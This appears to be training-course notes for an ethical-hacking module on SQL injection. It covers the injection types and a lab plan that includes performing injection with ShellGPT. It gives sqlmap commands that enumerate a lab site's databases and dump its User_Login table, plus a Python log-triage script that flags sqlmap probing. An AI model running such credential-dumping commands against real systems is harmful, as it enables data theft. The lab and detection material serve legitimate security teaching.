Module 15: SQL Injection

SQL injection attacks can be performed using various techniques to view, manipulate, insert, and delete data from an application’s database. There are three main types of SQL injection:

  • In-band SQL injection: An attacker uses the same communication channel to perform the attack and retrieve the results

  • Blind/inferential SQL injection: An attacker has no error messages from the system to work with, and instead simply sends a malicious SQL query to the database

  • Out-of-band SQL injection: An attacker uses different communication channels (such as database email functionality, or file writing and loading functions) to perform the attack and obtain the results


Ethical hackers or pen testers use numerous tools and techniques to perform SQL injection attacks on target web applications. The recommended labs that will assist you in learning various SQL injection techniques include:

  1. Perform SQL injection attacks

    • Perform an SQL injection attack against MSSQL to extract databases using sqlmap

  2. Detect SQL injection vulnerabilities using various SQL injection detection tools

    • Detect SQL injection vulnerabilities using OWASP ZAP

  3. Perform SQL injection using AI

    • Perform SQL injection using ShellGPT

Lab 1: Perform SQL Injection Attacks

Task 1: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

## Tools used in this section:
1. sqlmap
    sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" --dbs
    sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" -D moviescope --tables
    sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" -D moviescope -T User_Login --dump
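
For the defending side of this lab, the following added example (not part of the original notes) triages IIS W3C logs for the probing that the sqlmap runs above generate against the `id` parameter of `viewprofile.aspx`. The log lines are constructed, the names `triage` and `WATCHED_PARAMS` are hypothetical, and it assumes the profile id is always a plain integer.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (default field set); not captured from a real server.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-03-12 10:01:02 10.10.1.19 GET /viewprofile.aspx id=1 80 - 10.10.1.50 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 31
2024-03-12 10:02:10 10.10.1.19 GET /viewprofile.aspx id=1%20AND%201%3D1 80 - 10.10.1.13 sqlmap/1.8#stable+(https://sqlmap.org) - 200 0 0 40
2024-03-12 10:02:11 10.10.1.19 GET /viewprofile.aspx id=1%27 80 - 10.10.1.13 Mozilla/5.0+(Windows+NT+10.0) - 500 0 0 12
2024-03-12 10:03:00 10.10.1.19 GET /index.aspx - 80 - 10.10.1.50 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 8
"""

# Assumption: page -> query parameter that legitimate traffic always sends as an integer.
WATCHED_PARAMS = {"/viewprofile.aspx": "id"}


def triage(log_text):
    """Return (client_ip, reasons) for each request that looks like injection probing."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        reasons = []
        # sqlmap names itself in the User-Agent unless the operator overrides it.
        if "sqlmap" in row.get("cs(User-Agent)", "").lower():
            reasons.append("sqlmap user-agent")
        param = WATCHED_PARAMS.get(row.get("cs-uri-stem", "").lower())
        if param:
            query = row.get("cs-uri-query", "-")
            query = "" if query == "-" else query
            values = parse_qs(query, keep_blank_values=True).get(param, [])
            # Decode first, then require digits only; anything else is suspect.
            if any(not re.fullmatch(r"[0-9]+", v) for v in values):
                reasons.append(f"non-numeric {param}")
        if reasons:
            findings.append((row.get("c-ip", "?"), reasons))
    return findings


if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The parameter check is kept independent of the User-Agent check because the User-Agent is client-controlled and can be changed.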

Lab 2: Detect SQL Injection Vulnerabilities using Various SQL Injection Detection Tools

Task 1: Detect SQL Injection Vulnerabilities using OWASP ZAP

## Tools used in this section:
1. Zaproxy
